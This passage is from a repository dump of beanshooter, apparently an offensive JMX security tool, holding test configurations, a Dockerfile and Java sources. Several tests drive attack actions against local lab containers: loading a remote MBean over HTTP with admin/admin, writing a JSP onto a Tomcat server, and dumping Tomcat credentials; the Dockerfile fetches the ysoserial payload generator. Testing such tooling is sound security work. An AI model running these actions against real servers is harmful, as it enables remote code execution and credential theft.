the docker volume. 27 | Unfortunately, it is currently not possible to check the content of the written 28 | file when not running tricot as root. This is because the tomcat service in the 29 | currently used container runs as root and writes the file as read protected from 30 | other users. 31 | 32 | command: 33 | - beanshooter 34 | - tomcat 35 | - write 36 | - ${TARGET} 37 | - ${OPTIONS} 38 | - ${tempfile} 39 | - ${volume-d}/test.jsp 40 | 41 | validators: 42 | - error: False 43 | - contains: 44 | values: 45 | - 'Writing local file ${tempfile} to server location ${volume-d}/test.jsp' 46 | - 'conf/tomcat-users.xml' 47 | - 'All done.' 48 | - file_exists: 49 | files: 50 | - ${volume}/test.jsp 51 | cleanup: True 52 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: MBean releated tests 3 | description: |- 4 | This folder contains some MBean related tests. Since some MBeans were 5 | already deployed during the jmx-example-server tests, we use a new 6 | container from here. 7 | 8 | groups: 9 | - mbeans 10 | 11 | containers: 12 | - name: 'jmx-example-server' 13 | image: 'ghcr.io/qtc-de/beanshooter/jmx-example-server:2.0' 14 | volumes: 15 | - '${volume}:${volume-d}' 16 | aliases: 17 | DOCKER-jmx-example-server-IP: DOCKER-IP 18 | DOCKER-jmx-example-server-GATEWAY: DOCKER-GW 19 | init: 10 20 | 21 | variables: 22 | TARGET_UNAUTH: 23 | - ${DOCKER-IP} 24 | - 9010 25 | TARGET_PLAIN: 26 | - ${DOCKER-IP} 27 | - 1090 28 | TARGET_JMX: 29 | - ${DOCKER-IP} 30 | - 1099 31 | - --ssl 32 | JMXMP_UNAUTH: 33 | - ${DOCKER-IP} 34 | - 4444 35 | - --jmxmp 36 | JMXMP_TLS: 37 | - ${DOCKER-IP} 38 | - 4445 39 | - --jmxmp 40 | - --ssl 41 | JMXMP_PLAIN: 42 | - ${DOCKER-IP} 43 | - 4446 44 | - --jmxmp 45 | - --ssl 46 | - --sasl 47 | - plain 48 | JMXMP_DIGEST: 49 | - ${DOCKER-IP} 50 | - 4447 51 | - --jmxmp 52 | - --ssl 53 | - --sasl 54 | - digest 55 | JMXMP_CRAM: 56 | - ${DOCKER-IP} 57 | - 4448 58 | - --jmxmp 59 | - --ssl 60 | - --sasl 61 | - cram 62 | JMXMP_NTLM: 63 | - ${DOCKER-IP} 64 | - 4449 65 | - --jmxmp 66 | - --ssl 67 | - --sasl 68 | - ntlm 69 | 70 | testers: 71 | - ./tonka/tricot.yml 72 | - ./mlet/tricot.yml 73 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: TonkaBean related tests 3 | description: |- 4 | Testing the tonka bean requires a separate JMX server, since the 5 | bean was already loaded during the tests for the generic deploy 6 | actions. Also in this tests, we need to be careful. Once deployed 7 | once, the class is known to the JMX server and we cannot redeploy 8 | it. 9 | 10 | id: '03' 11 | groups: 12 | - tonka 13 | 14 | variables: 15 | TARGET_UNAUTH: 16 | - ${DOCKER-IP} 17 | - 9010 18 | TARGET_PLAIN: 19 | - ${DOCKER-IP} 20 | - 1090 21 | TARGET_JMX: 22 | - ${DOCKER-IP} 23 | - 1099 24 | - --ssl 25 | JMXMP_UNAUTH: 26 | - ${DOCKER-IP} 27 | - 4444 28 | - --jmxmp 29 | JMXMP_TLS: 30 | - ${DOCKER-IP} 31 | - 4445 32 | - --jmxmp 33 | - --ssl 34 | JMXMP_PLAIN: 35 | - ${DOCKER-IP} 36 | - 4446 37 | - --jmxmp 38 | - --ssl 39 | - --sasl 40 | - plain 41 | JMXMP_DIGEST: 42 | - ${DOCKER-IP} 43 | - 4447 44 | - --jmxmp 45 | - --ssl 46 | - --sasl 47 | - digest 48 | JMXMP_CRAM: 49 | - ${DOCKER-IP} 50 | - 4448 51 | - --jmxmp 52 | - --ssl 53 | - --sasl 54 | - cram 55 | JMXMP_NTLM: 56 | - ${DOCKER-IP} 57 | - 4449 58 | - --jmxmp 59 | - --ssl 60 | - --sasl 61 | - ntlm 62 | 63 | testers: 64 | - ./deploy/tricot.yml 65 | - ./version/tricot.yml 66 | - ./status/tricot.yml 67 | - ./exec/tricot.yml 68 | - ./execarray/tricot.yml 69 | - ./download/tricot.yml 70 | - ./upload/tricot.yml 71 | - ./undeploy/tricot.yml 72 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .internal 2 | .media 3 | .metadata 4 | bin/ 5 | tmp/ 6 | *.tmp 7 | *.bak 8 | *.swp 9 | *~.nib 10 | local.properties 11 | .settings/ 12 | .loadpath 13 | .recommenders 14 | 15 | # External tool builders 16 | .externalToolBuilders/ 17 | 18 | # Locally stored "Eclipse launch configurations" 19 | *.launch 20 | 21 | # PyDev specific (Python IDE for Eclipse) 22 | *.pydevproject 23 | 24 | # CDT-specific (C/C++ Development Tooling) 25 | .cproject 26 | 27 | # CDT- autotools 28 | .autotools 29 | 30 | # Java annotation processor (APT) 31 | .factorypath 32 | 33 | # PDT-specific (PHP Development Tools) 34 | .buildpath 35 | 36 | # sbteclipse plugin 37 | .target 38 | 39 | # Tern plugin 40 | .tern-project 41 | 42 | # TeXlipse plugin 43 | .texlipse 44 | 45 | # STS (Spring Tool Suite) 46 | .springBeans 47 | 48 | # Code Recommenders 49 | .recommenders/ 50 | 51 | # Annotation Processing 52 | .apt_generated/ 53 | .apt_generated_test/ 54 | 55 | # Scala IDE specific (Scala & Java development for Eclipse) 56 | .cache-main 57 | .scala_dependencies 58 | .worksheet 59 | 60 | # Uncomment this line if you wish to ignore the project description file. 61 | # Typically, this file would be tracked if it contains build/dependency configurations: 62 | #.project 63 | 64 | # Compiled class file 65 | *.class 66 | 67 | # Log file 68 | *.log 69 | 70 | # BlueJ files 71 | *.ctxt 72 | 73 | # Mobile Tools for Java (J2ME) 74 | .mtj.tmp/ 75 | 76 | # Package Files # 77 | *.jar 78 | *.war 79 | *.nar 80 | *.ear 81 | *.zip 82 | *.tar.gz 83 | *.rar 84 | 85 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml 86 | hs_err_pid* 87 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | ########################################### 2 | ### Build Stage 1 ### 3 | ########################################### 4 | FROM maven:3.8.6-openjdk-8-slim AS maven-builder 5 | COPY ./pom.xml /usr/src/app/pom.xml 6 | COPY ./beanshooter /usr/src/app/beanshooter 7 | COPY ./tonka-bean /usr/src/app/tonka-bean 8 | WORKDIR /usr/src/app 9 | RUN mvn clean package 10 | 11 | ########################################### 12 | ### Build Stage 2 ### 13 | ########################################### 14 | FROM alpine:latest AS jdk-builder 15 | RUN set -ex \ 16 | && apk add --no-cache openjdk11 \ 17 | && /usr/lib/jvm/java-11-openjdk/bin/jlink \ 18 | --add-modules java.desktop,java.management.rmi,jdk.naming.rmi,java.security.sasl,jdk.unsupported,jdk.httpserver,java.xml \ 19 | --verbose --strip-debug --compress 2 --no-header-files --no-man-pages --output /jdk 20 | 21 | ########################################### 22 | ### Container Stage ### 23 | ########################################### 24 | FROM alpine:latest 25 | 26 | COPY --from=maven-builder /usr/src/app/target/beanshooter-*-jar-with-dependencies.jar /opt/beanshooter.jar 27 | COPY --from=jdk-builder /jdk /usr/lib/jvm/java-11-openjdk 28 | 29 | RUN set -ex \ 30 | && ln -s /usr/lib/jvm/java-11-openjdk/bin/java /usr/bin/java \ 31 | && adduser -g '' -D -u 1000 beanshooter-user \ 32 | && wget -O /opt/yso.jar https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar 33 | 34 | USER beanshooter-user:beanshooter-user 35 | 36 | ENTRYPOINT ["java", "-jar", "/opt/beanshooter.jar"] 37 | -------------------------------------------------------------------------------- /docker/jmx-example-server/resources/server/src/de/qtc/beanshooter/server/rmi/PlainJmxConnector.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.server.rmi; 2 | 3 | import java.io.IOException; 4 | import java.lang.management.ManagementFactory; 5 | import java.util.HashMap; 6 | import java.util.Map; 7 | 8 | import javax.management.MBeanServer; 9 | import javax.management.remote.JMXConnectorServer; 10 | import javax.management.remote.JMXConnectorServerFactory; 11 | import javax.management.remote.JMXServiceURL; 12 | 13 | /** 14 | * Plain RMI based JMX server. 15 | * 16 | * @author Tobias Neitzel (@qtc_de) 17 | */ 18 | public class PlainJmxConnector { 19 | 20 | private JMXConnectorServer server; 21 | 22 | /** 23 | * Creates the server object. 24 | * 25 | * @param port port of an RMI Registry server on the local system 26 | * @throws IOException 27 | */ 28 | public PlainJmxConnector(int port) throws IOException 29 | { 30 | Map env = new HashMap(); 31 | 32 | MBeanServer mbeanServer = ManagementFactory.getPlatformMBeanServer(); 33 | JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://127.0.0.1:" + port + "/jmxrmi"); 34 | 35 | server = JMXConnectorServerFactory.newJMXConnectorServer(url, env, mbeanServer); 36 | } 37 | 38 | /** 39 | * Starts the JMX service. This binds the jmxrmi bound name to the RMI registry and exports the corresponding 40 | * remote object. 41 | * 42 | * @throws IOException 43 | */ 44 | public void start() throws IOException 45 | { 46 | server.start(); 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/mlet/load/jmxmp/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: mlet load action (JMXMP) 3 | description: |- 4 | Perform tests on beanshooters mlet load action for JMXMP based connections 5 | 6 | id: '04-02-03' 7 | groups: 8 | - rmi 9 | id_pattern: '04-02-03-{:02}' 10 | 11 | 12 | tests: 13 | - title: Deploy tonka bean 14 | description: |- 15 | Deploy the tonka bean by using the mlet load action 16 | 17 | command: 18 | - beanshooter 19 | - mlet 20 | - load 21 | - ${TARGET_PLAIN} 22 | - ${OPTIONS} 23 | - tonka 24 | - 'http://${DOCKER-GW}:8080' 25 | - --username 26 | - admin 27 | - --password 28 | - admin 29 | 30 | validators: 31 | - error: False 32 | - contains: 33 | values: 34 | - 'Loading MBean from http://${DOCKER-GW}:8080' 35 | - 'Incoming request from:' 36 | - 'de.qtc.beanshooter.tonkabean.TonkaBean' 37 | - 'MBean was loaded successfully' 38 | invert: 39 | - 'Sending jar file with md5sum:' 40 | 41 | 42 | - title: Undeploy tonka bean 43 | description: |- 44 | Undeploy the tonka bean using it's dedicated action 45 | 46 | command: 47 | - beanshooter 48 | - tonka 49 | - undeploy 50 | - ${TARGET_PLAIN} 51 | - ${OPTIONS} 52 | - --username 53 | - admin 54 | - --password 55 | - admin 56 | 57 | validators: 58 | - error: False 59 | - contains: 60 | values: 61 | - 'Removing MBean with ObjectName MLetTonkaBean:name=TonkaBean,id=1 from the MBeanServer' 62 | -------------------------------------------------------------------------------- /tests/jmx-example-server/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: JMX example server tests 3 | description: |- 4 | Contains tests that are based on the jmx-example-server docker container 5 | 6 | id: '01' 7 | groups: 8 | - jmx-example-server 9 | 10 | containers: 11 | - name: 'jmx-example-server' 12 | image: 'ghcr.io/qtc-de/beanshooter/jmx-example-server:2.0' 13 | volumes: 14 | - '${volume}:${volume-d}' 15 | aliases: 16 | DOCKER-jmx-example-server-IP: DOCKER-IP 17 | DOCKER-jmx-example-server-GATEWAY: DOCKER-GW 18 | init: 10 19 | 20 | variables: 21 | TARGET_UNAUTH: 22 | - ${DOCKER-IP} 23 | - 9010 24 | TARGET_PLAIN: 25 | - ${DOCKER-IP} 26 | - 1090 27 | TARGET_JMX: 28 | - ${DOCKER-IP} 29 | - 1099 30 | - --ssl 31 | JMXMP_UNAUTH: 32 | - ${DOCKER-IP} 33 | - 4444 34 | - --jmxmp 35 | JMXMP_TLS: 36 | - ${DOCKER-IP} 37 | - 4445 38 | - --jmxmp 39 | - --ssl 40 | JMXMP_PLAIN: 41 | - ${DOCKER-IP} 42 | - 4446 43 | - --jmxmp 44 | - --ssl 45 | - --sasl 46 | - plain 47 | JMXMP_DIGEST: 48 | - ${DOCKER-IP} 49 | - 4447 50 | - --jmxmp 51 | - --ssl 52 | - --sasl 53 | - digest 54 | JMXMP_CRAM: 55 | - ${DOCKER-IP} 56 | - 4448 57 | - --jmxmp 58 | - --ssl 59 | - --sasl 60 | - cram 61 | JMXMP_NTLM: 62 | - ${DOCKER-IP} 63 | - 4449 64 | - --jmxmp 65 | - --ssl 66 | - --sasl 67 | - ntlm 68 | 69 | testers: 70 | - ./brute/tricot.yml 71 | - ./invoke/tricot.yml 72 | - ./deploy/tricot.yml 73 | - ./enum/tricot.yml 74 | - ./list/tricot.yml 75 | - ./serial/tricot.yml 76 | - ./attr/tricot.yml 77 | - ./info/tricot.yml 78 | -------------------------------------------------------------------------------- /tests/serverless/stats/generic/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: stats action (Generic) 3 | description: |- 4 | Perform tests on beanshooters stats action 5 | 6 | id: '02-02-01' 7 | groups: 8 | - generic 9 | id_pattern: '02-02-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Check Tonka 14 | description: |- 15 | Check the output of the stats action for the tonka bean 16 | 17 | command: 18 | - beanshooter 19 | - tonka 20 | - stats 21 | - --no-color 22 | 23 | validators: 24 | - error: False 25 | - contains: 26 | values: 27 | - 'MLetTonkaBean:name=TonkaBean,id=1' 28 | - 'de.qtc.beanshooter.tonkabean.TonkaBean' 29 | - 'available (tonka-bean-' 30 | 31 | 32 | - title: Check MLet 33 | description: |- 34 | Check the output of the stats action for the mlet bean 35 | 36 | command: 37 | - beanshooter 38 | - mlet 39 | - stats 40 | - --no-color 41 | 42 | validators: 43 | - error: False 44 | - contains: 45 | values: 46 | - 'DefaultDomain:type=MLet' 47 | - 'javax.management.loading.MLet' 48 | - 'not available' 49 | 50 | 51 | - title: Check Tomcat 52 | description: |- 53 | Check the output of the stats action for the tomcat bean 54 | 55 | command: 56 | - beanshooter 57 | - tomcat 58 | - stats 59 | - --no-color 60 | 61 | validators: 62 | - error: False 63 | - contains: 64 | values: 65 | - 'Users:type=UserDatabase,database=UserDatabase' 66 | - 'org.apache.catalina.mbeans.MemoryUserDatabaseMBean' 67 | - 'not available' 68 | -------------------------------------------------------------------------------- /tests/jmx-example-server/info/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: info action (RMI) 3 | description: |- 4 | Perform tests on beanshooters info action for RMI based connections 5 | 6 | id: '01-08-01' 7 | groups: 8 | - rmi 9 | id_pattern: '01-08-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Global info 14 | description: |- 15 | Obtain information on methods and attributes from all MBeans 16 | 17 | command: 18 | - beanshooter 19 | - info 20 | - ${TARGET_UNAUTH} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: False 25 | - contains: 26 | values: 27 | - 'MBean Class: sun.management.MemoryManagerImpl' 28 | - 'ObjectName: java.lang:name=Metaspace Manager,type=MemoryManager' 29 | - 'Attributes:' 30 | - 'Operations:' 31 | - 'ObjectName (type: javax.management.ObjectName , writable: false)' 32 | 33 | 34 | - title: Compilation info 35 | description: |- 36 | Obtain information on methods and attributes from the java.lang:type=Compilation MBean 37 | 38 | command: 39 | - beanshooter 40 | - info 41 | - ${TARGET_UNAUTH} 42 | - ${OPTIONS} 43 | - java.lang:type=Compilation 44 | 45 | validators: 46 | - error: False 47 | - contains: 48 | values: 49 | - 'MBean Class: sun.management.CompilationImpl' 50 | - 'ObjectName: java.lang:type=Compilation' 51 | - 'Attributes:' 52 | - 'Operations:' 53 | - 'TotalCompilationTime (type: long , writable: false)' 54 | invert: 55 | - 'MBean Class: sun.management.MemoryManagerImpl' 56 | - 'ObjectName: java.lang:name=Metaspace Manager,type=MemoryManager' 57 | -------------------------------------------------------------------------------- /tests/jolokia/basic/info/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: info action 3 | description: |- 4 | Perform tests on beanshooters info action 5 | 6 | id: '15-05' 7 | groups: 8 | - info 9 | - target 10 | id_pattern: '15-05-01-{:02}' 11 | 12 | tests: 13 | - title: Global info 14 | description: |- 15 | Obtain information on methods and attributes from all MBeans 16 | 17 | command: 18 | - beanshooter 19 | - info 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: False 25 | - contains: 26 | values: 27 | - 'MBean Class: sun.management.MemoryManagerImpl' 28 | - 'ObjectName: java.lang:name=Metaspace Manager,type=MemoryManager' 29 | - 'Attributes:' 30 | - 'Operations:' 31 | - 'ObjectName (type: javax.management.ObjectName , writable: false)' 32 | 33 | 34 | - title: Compilation info 35 | description: |- 36 | Obtain information on methods and attributes from the java.lang:type=Compilation MBean 37 | 38 | command: 39 | - beanshooter 40 | - info 41 | - ${TARGET} 42 | - ${OPTIONS} 43 | - java.lang:type=Compilation 44 | 45 | validators: 46 | - error: False 47 | - contains: 48 | values: 49 | - 'MBean Class: sun.management.CompilationImpl' 50 | - 'ObjectName: java.lang:type=Compilation' 51 | - 'Attributes:' 52 | - 'Operations:' 53 | - 'TotalCompilationTime (type: long , writable: false)' 54 | invert: 55 | - 'MBean Class: sun.management.MemoryManagerImpl' 56 | - 'ObjectName: java.lang:name=Metaspace Manager,type=MemoryManager' 57 | 58 | testers: 59 | - ./error/tricot.yml 60 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/plugin/IArgumentProvider.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.plugin; 2 | 3 | import de.qtc.beanshooter.exceptions.PluginException; 4 | 5 | /** 6 | * The IArgumentProvider interface is used during beanshooters 'invoke' action to obtain the argument array that should 7 | * be used for the call. Plugins can implement this class to obtain custom argument arrays that they want to use during 8 | * the 'invoke' operation. The getArgumentArray method is called with the user specified argumentArray and is expected 9 | * to return an Object array that should be used for the call. 10 | * 11 | * When calling 'invoke', users have specify the full method signature like 'bool example(int arg1, long[] arg2)'. This 12 | * signature is passed to the getArgumentTypes function, which is expected to return an array of associated argument type 13 | * names. Such an array is required for each MBean call and additional parsing is required to create it. In the example 14 | * from above, the parsed argument type array would look like this: 'new String[] { "int", "[L" }'. This shows that 15 | * primitive types can cause problems and need to be handled with care. 16 | * 17 | * This interface is implemented by beanshooters de.qtc.beanshooter.plugin.providers.ArgumentProvider class. 18 | * 19 | * @author Tobias Neitzel (@qtc_de) 20 | */ 21 | public interface IArgumentProvider 22 | { 23 | Object[] getArgumentArray(String[] argumentArray) throws PluginException; 24 | Object strToObj(String str) throws PluginException; 25 | String[] getArgumentTypes(String signature) throws PluginException; 26 | String[] getArgumentTypes(String signature, boolean includeName) throws PluginException; 27 | String getMethodName(String signature) throws PluginException; 28 | } 29 | -------------------------------------------------------------------------------- /tests/jolokia/tomcat/attr/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat attr action 3 | description: |- 4 | Perform the attr action within the submenu of the tomcat 5 | operation. 6 | 7 | id: '10-01' 8 | groups: 9 | - attr 10 | id_pattern: '10-01-{:02}' 11 | 12 | tests: 13 | - title: Get Attr 14 | description: |- 15 | Use the attr operation to obtain the pathname attribute 16 | 17 | command: 18 | - beanshooter 19 | - tomcat 20 | - attr 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - pathname 24 | 25 | validators: 26 | - error: False 27 | - contains: 28 | values: 29 | - 'conf/tomcat-users.xml' 30 | 31 | - title: Set Attr 32 | description: |- 33 | Use the attr operation to set the pathname attribute 34 | 35 | command: 36 | - beanshooter 37 | - tomcat 38 | - attr 39 | - ${TARGET} 40 | - ${OPTIONS} 41 | - pathname 42 | - /tmp/test 43 | 44 | validators: 45 | - error: False 46 | 47 | - title: Get Attr 48 | description: |- 49 | Use the attr operation to obtain the pathname attribute 50 | 51 | command: 52 | - beanshooter 53 | - tomcat 54 | - attr 55 | - ${TARGET} 56 | - ${OPTIONS} 57 | - pathname 58 | 59 | validators: 60 | - error: False 61 | - contains: 62 | values: 63 | - '/tmp/test' 64 | 65 | - title: Restore Attr 66 | description: |- 67 | Restore the original value of the pathname attribute 68 | 69 | command: 70 | - beanshooter 71 | - tomcat 72 | - attr 73 | - ${TARGET} 74 | - ${OPTIONS} 75 | - pathname 76 | - 'conf/tomcat-users.xml' 77 | 78 | validators: 79 | - error: False 80 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/attr/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat attr action (RMI) 3 | description: |- 4 | Perform tests on the attr action within the submenu of the tomcat operation. 5 | 6 | id: '05-01-01' 7 | groups: 8 | - rmi 9 | id_pattern: '05-01-01-{:02}' 10 | 11 | tests: 12 | - title: Get Attr 13 | description: |- 14 | Use the attr operation to obtain the pathname attribute 15 | 16 | command: 17 | - beanshooter 18 | - tomcat 19 | - attr 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - pathname 23 | 24 | validators: 25 | - error: False 26 | - contains: 27 | values: 28 | - 'conf/tomcat-users.xml' 29 | 30 | - title: Set Attr 31 | description: |- 32 | Use the attr operation to set the pathname attribute 33 | 34 | command: 35 | - beanshooter 36 | - tomcat 37 | - attr 38 | - ${TARGET} 39 | - ${OPTIONS} 40 | - pathname 41 | - /tmp/test 42 | 43 | validators: 44 | - error: False 45 | 46 | - title: Get Attr 47 | description: |- 48 | Use the attr operation to obtain the pathname attribute 49 | 50 | command: 51 | - beanshooter 52 | - tomcat 53 | - attr 54 | - ${TARGET} 55 | - ${OPTIONS} 56 | - pathname 57 | 58 | validators: 59 | - error: False 60 | - contains: 61 | values: 62 | - '/tmp/test' 63 | 64 | - title: Restore Attr 65 | description: |- 66 | Restore the original value of the pathname attribute 67 | 68 | command: 69 | - beanshooter 70 | - tomcat 71 | - attr 72 | - ${TARGET} 73 | - ${OPTIONS} 74 | - pathname 75 | - 'conf/tomcat-users.xml' 76 | 77 | validators: 78 | - error: False 79 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/plugin/providers/AuthenticationProvider.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.plugin.providers; 2 | 3 | import java.util.HashMap; 4 | import java.util.Map; 5 | 6 | import javax.management.remote.JMXConnector; 7 | import javax.rmi.ssl.SslRMIClientSocketFactory; 8 | 9 | import de.qtc.beanshooter.operation.BeanshooterOption; 10 | import de.qtc.beanshooter.plugin.IAuthenticationProvider; 11 | 12 | /** 13 | * The default implementation for the IAuthenticationProvider interface creates an JMX environment that contains 14 | * the JMXConnector.CREDENTIALS key with an associated String array containing username and password. Additionally, 15 | * if --ssl was used, the com.sun.jndi.rmi.factory.socket property is set. 16 | * 17 | * @author Tobias Neitzel (@qtc_de) 18 | */ 19 | public class AuthenticationProvider implements IAuthenticationProvider 20 | { 21 | /** 22 | * Authentication to JMX endpoints is usually handled using a map that contains the authentication 23 | * parameters. This function is used to prepare such a map by using an explicitly defiend username 24 | * and password. 25 | * 26 | * @param username the desired username for JMX authentication 27 | * @param password the desired password for JMX authentication 28 | * @return environment that should be used during the newClient call 29 | */ 30 | public Map getEnv(String username, String password) 31 | { 32 | HashMap env = new HashMap(); 33 | 34 | if(BeanshooterOption.CONN_SSL.getBool()) 35 | env.put("com.sun.jndi.rmi.factory.socket", new SslRMIClientSocketFactory()); 36 | 37 | if(username != null && password != null) 38 | env.put(JMXConnector.CREDENTIALS, new String[] {username, password}); 39 | 40 | return env; 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /docker/jmx-example-server/resources/server/src/de/qtc/beanshooter/server/jmxmp/SslJmxmpServer.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.server.jmxmp; 2 | 3 | import java.io.IOException; 4 | import java.lang.management.ManagementFactory; 5 | import java.security.NoSuchAlgorithmException; 6 | import java.util.HashMap; 7 | import java.util.Map; 8 | 9 | import javax.management.MBeanServer; 10 | import javax.management.remote.JMXConnectorServer; 11 | import javax.management.remote.JMXConnectorServerFactory; 12 | import javax.management.remote.JMXServiceURL; 13 | import javax.net.ssl.SSLContext; 14 | import javax.net.ssl.SSLSocketFactory; 15 | 16 | /** 17 | * Just a TLS protected JMXMP listener that does not require authentication. 18 | * 19 | * @author Tobias Neitzel (@qtc_de) 20 | */ 21 | public class SslJmxmpServer { 22 | 23 | private JMXConnectorServer server; 24 | 25 | /** 26 | * Create the server object. The server uses the globally configured TLS certificate. 27 | * 28 | * @param port port number to launch the server on 29 | * @throws IOException 30 | */ 31 | public SslJmxmpServer(int port) throws IOException, NoSuchAlgorithmException 32 | { 33 | Map env = new HashMap(); 34 | 35 | SSLContext ctx = SSLContext.getDefault(); 36 | SSLSocketFactory ssf = ctx.getSocketFactory(); 37 | 38 | env.put("jmx.remote.profiles", "TLS"); 39 | env.put("jmx.remote.tls.socket.factory", ssf); 40 | 41 | MBeanServer mbeanServer = ManagementFactory.getPlatformMBeanServer(); 42 | JMXServiceURL url = new JMXServiceURL("jmxmp", "0.0.0.0", port); 43 | 44 | server = JMXConnectorServerFactory.newJMXConnectorServer(url, env, mbeanServer); 45 | } 46 | 47 | /** 48 | * Start the server. 49 | * 50 | * @throws IOException 51 | */ 52 | public void start() throws IOException 53 | { 54 | server.start(); 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/dump/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat dump action (RMI) 3 | description: |- 4 | Perform tests on the dump action within the submenu of the tomcat operation. 5 | 6 | id: '05-02-01' 7 | groups: 8 | - rmi 9 | id_pattern: '05-02-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Dump user only 14 | description: |- 15 | Dump usernames from the tomcat server 16 | 17 | command: 18 | - beanshooter 19 | - tomcat 20 | - dump 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - users.txt 24 | 25 | validators: 26 | - error: False 27 | - regex: 28 | match: 29 | - 'Users dumped to .+users.txt' 30 | - file_contains: 31 | - file: users.txt 32 | contains: 33 | - 'manager:P@55w0rD#' 34 | - 'admin:s3cr3T!$' 35 | - 'status:cr@cKM3o.O' 36 | - file_exists: 37 | cleanup: True 38 | files: 39 | - users.txt 40 | 41 | - title: Dump users and passwords 42 | description: |- 43 | Dump usernames and passwords from the tomcat server 44 | 45 | command: 46 | - beanshooter 47 | - tomcat 48 | - dump 49 | - ${TARGET} 50 | - ${OPTIONS} 51 | - users.txt 52 | - passwords.txt 53 | 54 | validators: 55 | - error: False 56 | - regex: 57 | match: 58 | - 'Users dumped to .+users.txt' 59 | - 'Passwords dumped to .+passwords.txt' 60 | - file_contains: 61 | - file: users.txt 62 | contains: 63 | - 'manager' 64 | - 'admin' 65 | - 'status' 66 | - file: passwords.txt 67 | contains: 68 | - 'P@55w0rD#' 69 | - 's3cr3T!$' 70 | - 'cr@cKM3o.O' 71 | - file_exists: 72 | cleanup: True 73 | files: 74 | - users.txt 75 | - passwords.txt 76 | -------------------------------------------------------------------------------- /tests/jolokia/tomcat/dump/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat dump action 3 | description: |- 4 | Perform some tests on the dump action of beanshooters tomcat operation 5 | 6 | id: '10-02' 7 | groups: 8 | - dump 9 | id_pattern: '10-02-01-{:02}' 10 | 11 | tests: 12 | - title: Dump single file 13 | description: |- 14 | Create a single file dump of tomcat credentials 15 | 16 | command: 17 | - beanshooter 18 | - tomcat 19 | - dump 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - users.txt 23 | 24 | validators: 25 | - error: False 26 | - regex: 27 | match: 28 | - 'Users dumped to .+users.txt' 29 | - file_contains: 30 | - file: users.txt 31 | contains: 32 | - 'manager:admin' 33 | - 'admin:s3cr3T!$' 34 | - 'status:cr@cKM3o.O' 35 | - file_exists: 36 | cleanup: True 37 | files: 38 | - users.txt 39 | 40 | - title: Dump users and passwords 41 | description: |- 42 | Dump usernames and passwords from the tomcat server 43 | 44 | command: 45 | - beanshooter 46 | - tomcat 47 | - dump 48 | - ${TARGET} 49 | - ${OPTIONS} 50 | - users.txt 51 | - passwords.txt 52 | 53 | validators: 54 | - error: False 55 | - regex: 56 | match: 57 | - 'Users dumped to .+users.txt' 58 | - 'Passwords dumped to .+passwords.txt' 59 | - file_contains: 60 | - file: users.txt 61 | contains: 62 | - 'manager' 63 | - 'admin' 64 | - 'status' 65 | - file: passwords.txt 66 | contains: 67 | - 'admin' 68 | - 's3cr3T!$' 69 | - 'cr@cKM3o.O' 70 | - file_exists: 71 | cleanup: True 72 | files: 73 | - users.txt 74 | - passwords.txt 75 | 76 | testers: 77 | - ./error/tricot.yml 78 | -------------------------------------------------------------------------------- /tests/jolokia/basic/attr/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: attr action (Error) 3 | description: |- 4 | Performs some test on error cases that can occur during the attr action 5 | 6 | id: '15-01-02' 7 | groups: 8 | - error 9 | id_pattern: '15-01-02-{:02}' 10 | 11 | tests: 12 | - title: Invalid Object Name 13 | description: |- 14 | Invoke attr action with an invalid object name as target 15 | 16 | command: 17 | - beanshooter 18 | - attr 19 | - ${TARGET} 20 | - ${OPTIONS} 21 | - test 22 | - test 23 | 24 | validators: 25 | - error: True 26 | - contains: 27 | values: 28 | - The specified ObjectName test is invalid 29 | 30 | 31 | - title: Not available ObjectName 32 | description: |- 33 | Invoke attr action with an object name that does not exist 34 | 35 | command: 36 | - beanshooter 37 | - attr 38 | - ${TARGET} 39 | - ${OPTIONS} 40 | - test:v=1 41 | - test 42 | 43 | validators: 44 | - error: True 45 | - contains: 46 | values: 47 | - The specified MBean test:v=1 does probably not exist on the endpoint 48 | 49 | 50 | - title: Non existing attribute 51 | description: |- 52 | Invoke attr action with a non existing attribute name 53 | 54 | command: 55 | - beanshooter 56 | - attr 57 | - ${TARGET} 58 | - ${OPTIONS} 59 | - java.lang:type=Memory 60 | - test 61 